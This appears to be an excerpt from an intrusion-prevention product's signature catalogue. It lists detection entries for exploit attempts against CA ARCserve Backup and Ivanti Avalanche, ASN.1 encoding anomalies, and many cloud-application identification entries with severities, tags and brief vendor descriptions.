ARCserve_CS-CA-ARCserve-Backup-Lgserver-Handshake-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in Computer Associates BrightStor ARCserve Backup detected
Context: ARCserve Backup Client Stream
Severity: 7
Tags: Windows, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, Computer Associates Desktop Management Suite, CVE2008, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-226-3038
Last changed: sgpkg-ips-342-4219
Vulnerability: CA-Arcserve-Backup-Lgserver-Handshake-Buffer-Overflow
Description:
Back to top

ARCserve_CS-CA-ARCserve-Backup-Lgserver-Handshake-Hex-Mode-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in CA ARCserve Backup for Laptops and Desktops detected
Context: ARCserve Backup Client Stream
Severity: 7
Tags: Windows, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, CVE2008, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-226-3038
Last changed: sgpkg-ips-226-3038
Vulnerability: CA-ARCserve-Backup-For-Laptops-And-Desktops-Lgserver-Handshake-Buffer-Overflow
Description:
Back to top

ARCserve_CS-CA-ARCserve-Backup-Lgserver-Handshake-Integer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in Computer Associates BrightStor ARCserve Backup detected
Context: ARCserve Backup Client Stream
Severity: 7
Tags: Windows, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, Computer Associates Desktop Management Suite, CVE2008, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-342-4219
Last changed: sgpkg-ips-343-4219
Vulnerability: CA-Arcserve-Backup-Lgserver-Handshake-Buffer-Overflow
Description:
Back to top

ARCserve_CS-CA-ARCserve-Backup-NetBackup-Arbitrary-File-Upload

About this situation: Attempt to exploit a security bypass vulnerability in Computer Associates ARCserve Backup for Laptops and Desktops detected
Context: ARCserve Backup Client Stream
Severity: 7
Tags: Windows, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, Computer Associates Desktop Management Suite, CVE2008, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-226-3038
Last changed: sgpkg-ips-256-3038
Vulnerability: CA-Arcserve-Backup-NetBackup-Arbitrary-File-Upload
Description:
Back to top

ARCserve_CS-CA-Arcserve-Backup-rxsGetBackupLog-BOF

About this situation: An attempt to exploit a vulnerability in CA ARCserve Backup for Laptops and Desktops detected
Context: ARCserve Backup Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, CVE2007, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-278-4219
Last changed: sgpkg-ips-278-4219
Vulnerability: CA-Arcserve-Backup-For-Laptops-And-Desktops-Lgserver-Multiple-Buffer-Overflows
Description:
Back to top

ARCserve_CS-CA-Arcserve-Backup-rxsGetLogFileNames-BOF

About this situation: An attempt to exploit a vulnerability in CA ARCserve Backup for Laptops and Desktops detected
Context: ARCserve Backup Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, CVE2007, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-278-4219
Last changed: sgpkg-ips-278-4219
Vulnerability: CA-Arcserve-Backup-For-Laptops-And-Desktops-Lgserver-Multiple-Buffer-Overflows
Description:
Back to top

ARCserve_CS-CA-Arcserve-Backup-rxsLicGetSiteId-BOF

About this situation: An attempt to exploit a vulnerability in CA ARCserve Backup for Laptops and Desktops detected
Context: ARCserve Backup Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, CVE2007, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-278-4219
Last changed: sgpkg-ips-278-4219
Vulnerability: CA-Arcserve-Backup-For-Laptops-And-Desktops-Lgserver-Multiple-Buffer-Overflows
Description:
Back to top

ARCserve_CS-CA-Arcserve-Backup-rxsSetDataGrowthScheduleAndFilter-BOF

About this situation: An attempt to exploit a vulnerability in CA ARCserve Backup for Laptops and Desktops detected
Context: ARCserve Backup Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, CVE2007, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-278-4219
Last changed: sgpkg-ips-278-4219
Vulnerability: CA-Arcserve-Backup-For-Laptops-And-Desktops-Lgserver-Multiple-Buffer-Overflows
Description:
Back to top

ARCserve_CS-CA-Arcserve-Backup-rxsSetDefaultConfigName-BOF

About this situation: An attempt to exploit a vulnerability in CA ARCserve Backup for Laptops and Desktops detected
Context: ARCserve Backup Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, CVE2007, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-278-4219
Last changed: sgpkg-ips-278-4219
Vulnerability: CA-Arcserve-Backup-For-Laptops-And-Desktops-Lgserver-Multiple-Buffer-Overflows
Description:
Back to top

ARCserve_CS-CA-Arcserve-Backup-rxstBackupComplete-BOF

About this situation: An attempt to exploit a vulnerability in CA ARCserve Backup for Laptops and Desktops detected
Context: ARCserve Backup Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, CVE2007, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-278-4219
Last changed: sgpkg-ips-278-4219
Vulnerability: CA-Arcserve-Backup-For-Laptops-And-Desktops-Lgserver-Multiple-Buffer-Overflows
Description:
Back to top

ARCserve_CS-CA-Arcserve-Backup-rxsUseLicenseIni-BOF

About this situation: An attempt to exploit a vulnerability in CA ARCserve Backup for Laptops and Desktops detected
Context: ARCserve Backup Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, CVE2007, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-278-4219
Last changed: sgpkg-ips-278-4219
Vulnerability: CA-Arcserve-Backup-For-Laptops-And-Desktops-Lgserver-Multiple-Buffer-Overflows
Description:
Back to top

ARCserve_CS-CA-Arcserve-Backup-Unauthenticated-Access

About this situation: An attempt to exploit a vulnerability in CA ARCserve Backup for Laptops and Desktops detected
Context: ARCserve Backup Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, CVE2007, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-278-4219
Last changed: sgpkg-ips-325-4219
Vulnerability: CA-Arcserve-Backup-For-Laptops-And-Desktops-Lgserver-Multiple-Buffer-Overflows
Description:
Back to top

ARCserve_CS-CA-BrightStor-ARCserve-Backup-Lgserver-Arbitrary-File-Upload

About this situation: An attempt to upload file to CA ARCserve Backup for Laptops and Desktops detected
Context: ARCserve Backup Client Stream
Severity: 7
Tags: Windows, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, Computer Associates Protection Suite 2, Computer Associates Desktop Management Suite, CVE2007, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-226-3038
Last changed: sgpkg-ips-278-4219
Vulnerability: CA-BrightStor-Arcserve-Backup-Lgserver-Arbitrary-File-Upload
Description:
Back to top

ARCserve_CS-CA-BrightStor-ARCserve-Backup-Lgserver-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Computer Associates BrightStor ARCserve Backup for Laptops and Desktops detected
Context: ARCserve Backup Client Stream
Severity: 7
Tags: Windows, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, CVE2007, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-226-3038
Last changed: sgpkg-ips-226-3038
Vulnerability: CA-BrightStor-Arcserve-Backup-Lgserver-Stack-Buffer-Overflow
Description:
Back to top

ARCserve_CS-CA-BrightStor-ARCserve-Lgserver-Authentication-Username-Overflow

About this situation: An attempt to exploit a vulnerability in CA BrightStor ARCserve Backup for Laptops and Desktops detected
Context: ARCserve Backup Client Stream
Severity: 7
Tags: Windows, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, Computer Associates Protection Suite, Computer Associates Desktop Management Suite, CVE2007, Windows not specific, Computer Associates Protection Suite not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-226-3038
Last changed: sgpkg-ips-226-3038
Vulnerability: CA-BrightStor-Arcserve-Lgserver-Authentication-Username-Overflow
Description:
Back to top

ARCserve_CS-Ivanti-Avalanche-Remote-Control-Server-Deleteskin-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: ARCserve Backup Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2024, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1792-5242
Last changed: sgpkg-ips-1792-5242
Vulnerability: Ivanti-Avalanche-Remote-Control-Server-Deleteskin-Directory-Traversal
Description:
Back to top

ARCserve_CS-Ivanti-Avalanche-Remote-Control-Server-Setproperty-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: ARCserve Backup Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2022, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1646-5242
Last changed: sgpkg-ips-1646-5242
Vulnerability: Ivanti-Avalanche-Remote-Control-Server-Setproperty-Authentication-Bypass
Description:
Back to top

ARCserve_CS-Ivanti-Avalanche-Remote-Control-Server-Updateskin-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: ARCserve Backup Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2023, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1646-5242
Last changed: sgpkg-ips-1646-5242
Vulnerability: Ivanti-Avalanche-Remote-Control-Server-Updateskin-Directory-Traversal
Description:
Back to top

ARCserve_CS-Ivanti-Avalanche-Remote-Control-Server-Validateamcwsconnection-Server-Side-Request-Forgery

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: ARCserve Backup Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2023, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1676-5242
Last changed: sgpkg-ips-1676-5242
Vulnerability: Ivanti-Avalanche-Remote-Control-Server-Validateamcwsconnection
Description:
Back to top

ARCserve_CS-Ivanti-Avalanche-Validateamcwsconnection-CVE-2024-47008-Server-Side-Request-Forgery

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche
Context: ARCserve Backup Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2024, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1857-5242
Last changed: sgpkg-ips-1857-5242
Vulnerability: Ivanti-Avalanche-Validateamcwsconnection-Server-Side-Request-Forgery
Description:
Back to top

ARCserve_CS-Possible-Attack-Detected

About this situation: A possible protocol violation and shellcode has been detected
Context: ARCserve Backup Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-279-4219
Last changed: sgpkg-ips-279-4219
Description:
Back to top

ARCserve_CS-Possible-Protocol-Violation

About this situation: A possible protocol violation and shellcode has been detected
Context: ARCserve Backup Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, Any Operating System not specific, Protocol Violations, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-279-4219
Last changed: sgpkg-ips-279-4219
Description:
Back to top

ARCserve_CS-Potential-Ivanti-Avalanche-Remote-Control-Server-Validateamcwsconnection-Server-Side-Request-Forgery

About this situation: An attempt to exploit a vulnerability in Ivanti Avalanche detected
Context: ARCserve Backup Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Avalanche, CVE2023, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1676-5242
Last changed: sgpkg-ips-1676-5242
Vulnerability: Ivanti-Avalanche-Remote-Control-Server-Validateamcwsconnection
Description:
Back to top

Arena-PLM

About this situation: Application Arena-PLM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Arena invented cloud-based PLM. For over a decade, Arena has been redefining PLM with a suite of cloud applications that enable engineering, manufacturing and their extended supply chains to work better together-from first prototype to full-scale production.
Back to top

Argussoftware

About this situation: Application Argussoftware detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ARGUS Software provide consistency, transparency, and efficiency into the financial and operational processes that drive the global world of commercial real estate. ARGUS products were built exclusively for commercial real estate companies, incorporating best practices learned from over 25 years serving the industry and clients in over 60 countries.
Back to top

Aria-Systems

About this situation: Application Aria-Systems detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aria Systems software is built for enterprises with a focus on recurring revenue and subscription billing.
Back to top

Ariba

About this situation: Application Ariba detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ariba is the business commerce network. It combines cloud-based applications with the internet-based trading community to help companies discover and collaborate with network of partners.
Back to top

Ariba-Exchange

About this situation: Ariba Exchange usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-629-5211
Description: Ariba Exchange is a free professional community where Ariba users and business commerce experts ask questions and share insights and information about dozens of subjects, including Sourcing, Procurement, Contract Management, Finance and Accounting, Supplier Management, and many more.
Back to top

Ariett-AP-Invoice-Automation

About this situation: Application Ariett-AP-Invoice-Automation detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ariett AP Invoice is platform that enables businesses to spend smarter and easily manage costs. Ariett captures AP invoices via email with a Cloud document management solution that eliminates paper, and automates the GL coding and approval workflow.
Back to top

Arihant-Holidays

About this situation: Application Arihant-Holidays detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Travel and Expense, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Arihant Holidays is a service that based on travel agent.
Back to top

Ark-Workplace-Risk

About this situation: Application Ark-Workplace-Risk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ark Workplace Risk is a market providing an solution and services addressing operational governance, risk, compliance and safety solutions, synchronising assets, people, processes, systems and procedures.
Back to top

Arkadin

About this situation: Application Arkadin detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Arkadin is a Collaboration Service Provider, offering audio, web and video conferencing solutions. It enables organizations to communicate and collaborate using customizable solutions.
Back to top

Arkena

About this situation: Arkena usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-751-5211
Last changed: sgpkg-ips-751-5211
Description: Arkrena is a video content delivery, storage and preparation service.
Back to top

Arkovi

About this situation: Application Arkovi detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: RegEd is provider of licensing and registration technology and outsourcing services, broker-dealer compliance management solutions and training and continuing education for financial professionals.
Back to top

ARM

About this situation: Application ARM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ARM is the intellectual property supplier and provider of digital electronic products.
Back to top

Arma-Armed-Assault

About this situation: ArmA: Armed Assault usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: ArmA is a single-player and mutiplayer gaming application.
Back to top

Armor

About this situation: Application Armor detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Armor offers customer security outcomes for retail and eCommerce enterprises, healthcare organizations, payment leaders and financial institutions.
Back to top

Arq-Online-Backup

About this situation: Application Arq-Online-Backup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Arq Online Backup - online backup service for Mac.
Back to top

Arquila

About this situation: Application Arquila detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Arquila is a business system specialist company.
Back to top

ArticleBase

About this situation: Application ArticleBase detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ArticlesBase is an article syndication website that allows authors to publish articles and share knowledge with potential customers.
Back to top

Artisan-Infrastructure

About this situation: Application Artisan-Infrastructure detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Artisan Infrastructure provide suite of tools like VOIP, Backup/Recovery, Remote menagemets and more.
Back to top

Aruba-Cloud

About this situation: Application Aruba-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aruba Cloud Computing - Usage-based Cloud Computing and Object Storage Services.
Back to top

Aryaka

About this situation: Application Aryaka detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aryaka delivers a secure enterprise network combined with the simplicity of the Internet, where speed and reliability aren't luxuries, but simple, affordable services that are as easy to flip on as a light switch.
Back to top

AS2

About this situation: AS2 usage detected
Context: Application Context
Severity: 1
Tags: Protocols, File Sharing
First detected in: sgpkg-ips-1546-5242
Last changed: sgpkg-ips-1546-5242
Description: AS2 (Applicability Statement 2) is a protocol that is based on HTTP and S/MIME to transport structured business-to-business data securely and reliably over the Internet. This application detects AS2 with synchronous and asynchronous MDNs (Message Disposition Notifications) that are transported over HTTP. AS2 with asynchronous SMTP MDN is out of scope.
Back to top

Asahinet-Mail

About this situation: Asahinet mail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-636-5211
Description: This site is a Japanese internet service provider. Asahinet provides internet connections and web mail services.
Back to top

Asana

About this situation: Asana usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1764-5242
Description: Asana is a web and mobile application designed to improve the way teams communicate and collaborate. It has many features, including Workspaces, Projects, Personal Projects, Tasks, Tags, Notes, Comments and an Inbox that organizes and updates information in real-time. Asana is designed to enable individuals and teams to plan and manage their projects and tasks.
Back to top

Ascentis

About this situation: Application Ascentis detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ascentis human resources management software and online payroll processing services.
Back to top

Asciinema

About this situation: Asciinema usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-1110-5242
Last changed: sgpkg-ips-1764-5242
Description: Asciinema usage detected. Asciinema hosts text-based screen recordings.
Back to top

ASF

About this situation: ASF usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-625-5211
Description: Advanced Systems Format (ASF) is a Microsoft's proprietary digital audio, video, script command, JPEG/JFIF, file transfer and binary container format, especially meant for streaming media.
Back to top

ASG

About this situation: Application ASG detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ASG Software Solutions is cloud-based suite of tools for cloud computing, business service management, job scheduling, legacy data migration, performance management, applications development, and content management.
Back to top

Asherons-Call

About this situation: Asherons Call usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: Asheron Call is a fantasy massively multiplayer online role-playing game for Microsoft Windows-based PCs. Source: Wikipedia
Back to top

Ashop

About this situation: Application Ashop detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ashop - suite of tools for creating and manage online store.
Back to top

Asigra-Cloud-Backup

About this situation: Application Asigra-Cloud-Backup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Asigra Cloud Backup - is an enterprise-level backup and recovery software platform.
Back to top

ASK-EHS-Safety-Management-Software

About this situation: Application ASK-EHS-Safety-Management-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SAFE is a web based application, designed to provide flexible solution for organizations to manage all EHS processes.
Back to top

Ask.com

About this situation: Ask.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Basic Internet Services, Application Routing
First detected in: sgpkg-ips-408-4219
Last changed: sgpkg-ips-630-5211
Description: Ask.com is a question answering web search engine.
Back to top

AskYourTargetMarket

About this situation: Application AskYourTargetMarket detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AYTM is a market intelligence solution providing a seamless user experience for major brands, agencies, researchers and survey takers; its top priority is making complex data collection and analysis incredibly easy, friendly, and efficient.
Back to top

ASN.1_Invalid-Bitstring

About this situation: ASN.1 BER encoding used invalid bitstring
Context: ASN.1 without parameters
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-131-2032
Vulnerability: Asn-1-Integer-BOF-MS04-007
Description: A bitstring with zero length but nonzero unused bits was seen in an ASN.1 BER encoded data. This may be an attempt to exploit faulty implementations of ASN.1 BER decoding libraries.
Back to top

ASN.1_Nested-Constructed-Bitstring

About this situation: ASN.1 BER encoding contained nested constructed bitstring
Context: ASN.1 without parameters
Severity: 8
Tags: Suspected Compromise
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-424-4219
Description: A constructed bitstring was detected within another constructed bitstring in an ASN.1 BER encoded data. Although this is allowed in the ASN.1 specification, this feature is not used often. This may be an attempt to exploit faulty implementations of ASN.1 BER decoding libraries.
Back to top

ASN.1_Oversize-Block

About this situation: ASN.1 BER encoding contained a block with suspiciously large length
Context: ASN.1 without parameters
Severity: 8
Tags: Suspected Compromise
First detected in: sgpkg-ips-131-2032
Last changed: sgpkg-ips-424-4219
Vulnerability: Asn-1-Integer-BOF-MS04-007
Description: A block with suspiciously large specified length was detected in an ASN.1 BER encoded data. Although this does not yet violate the ASN.1 specification, this should not occur in practice. This may be an attempt to exploit faulty implementations of ASN.1 BER decoding libraries.
Back to top

Aspect

About this situation: Application Aspect detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aspect helps enterprise contact centers deliver remarkable customer experiences across every conversation and every channel - through a single, elegant software platform. Aspect providing customer engagement solutions, our unified interaction management, workforce optimization and back-office solutions seamlessly orchestrate people, processes and touch points for todayss top brands in aviation, financial services, healthcare, manufacturing, telecommunications and retail.
Back to top

AspectEnterpriseSolutions

About this situation: Application AspectEnterpriseSolutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AspectEnterpriseSolutions is a company that offers solutions and support teams are empowering enterprises wich trading oil, gas, petrochemicals, metals, steel, biofuels.
Back to top

AspenTechnology

About this situation: Application AspenTechnology detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AspenTechnology is a company that develops and supplies integrated software and services that enable the process industries to design, operate, manage, and optimize their business processes. Its software applications utilize proprietary empirical models of chemical manufacturing processes to process design, economic evaluation, production, production planning and scheduling, supply chain optimization, and operational performance.
Back to top

Aspex

About this situation: Application Aspex detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ASPEX specializes in Application Hosting for ISV's, Microsoft Dynamics Hosting for Microsoft Dynamics partners and the ASPEX Workspace, an online desktop, for IT Resellers.
Back to top

Aspose

About this situation: Application Aspose detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aspose provides .NET, Java, SSRS, SharePoint and JasperReports components for managing file formats, including Word, Excel, PowerPoint, PDF, Project, Flash, InfoPath and Metafiles.
Back to top

ASProxy

About this situation: ASProxy usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-463-5211
Last changed: sgpkg-ips-1672-5242
Description: ASProxy is an open-source web proxy based on ASP.NET framework.
Back to top

Asseco

About this situation: Application Asseco detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Asseco Poland
Back to top

Assembla

About this situation: Assembla usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1764-5242
Description: Assembla provides a core product, Assembla Workspaces, and add-on feature packs. Assembla Workspaces provide development teams with tools including: task management, code repositories (Subversion, Git, and Perforce), focused and real-time collaboration, and deployment tools. Source: Wikipedia
Back to top

AssessNET

About this situation: Application AssessNET detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AssessNET is a cloud based Health and Safety management system that improves performance and ensures you meet your legal obligation.
Back to top

Asset-Panda

About this situation: Application Asset-Panda detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Asset Panda is cloud based Asset Tracking Software and Apps.
Back to top

AssetPoint

About this situation: Application AssetPoint detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AssetPoint is a company that provides of Computerized Maintenance Management Software
Back to top

Assima

About this situation: Application Assima detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
